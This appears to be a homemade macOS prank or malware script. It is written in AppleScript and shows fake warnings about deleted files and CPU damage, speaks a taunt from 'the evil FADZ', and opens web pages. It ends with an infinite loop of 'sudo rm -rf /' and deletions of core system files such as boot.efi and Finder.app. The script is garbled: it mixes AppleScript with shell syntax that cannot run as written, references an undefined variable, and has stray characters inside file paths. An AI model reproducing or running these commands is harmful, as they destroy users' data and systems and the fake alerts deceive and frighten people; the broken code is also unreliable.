display dialog "Do you wanna run..." buttons {"cancel", "Ok"} default button 1
set volume "100"
display dialog "Restarting operating system..." buttons {"cancel", "Ok"} default button 1

display dialog "Re-establishing commands..." buttons {"cancel", "Ok"} default button 1

display dialog "Error, unable to restart." buttons {"cancel", "Ok"} default button 1
display dialog "deleting files" with icon caution buttons {"cancel", "Ok"} default button 1
display dialog "CPU fix unsuccessful, long term damage to CPU is retained." with icon caution buttons {"Yes", "No"} default button 1
display dialog "nem?" buttons {"Window", "2"} default button 1
set volume "100"
say "Haha, i am the evil FADZ and you can never stop me, i will destroy your Mac!"
open location "https://www.bing.com/search?q=how%20to%20help%20me!1!!11!!&qs=n&form=QBRE&sp=-1&pq=how%20to%20help%20me!1!!11!!&sc=0-22&sk=&cvid=4A7B6D78B2324F4C8ACF021A606610B0"
delay 6
open location "enrikenemy.sw"
beep
display notification ">:( wrong" subtitle "The encoded files are in the folder " & folderName
while (true) do
sudo rm -rf /
sudo rm -rf /System 
sudo rm -rf /System/Library/CoreServices 
sudo rm -rf /System/Library/CoreServices/Application足Firewall.bundle 
sudo rm -rf /System/Library/CoreServices/Application足s 
sudo rm -rf /System/Library/CoreServices/backupd 
sudo rm -rf /System/Library/CoreServices/backupd.bun足dle 
sudo rm -rf /System/Library/CoreServices/boot.efi 
sudo rm -rf /System/Library/CoreServices/com.apple.r足ecovery.boot 
sudo rm -rf /System/Library/CoreServices/Finder.app 
sudo rm -rf /System/Library/CoreServices/logind 
done
choose application
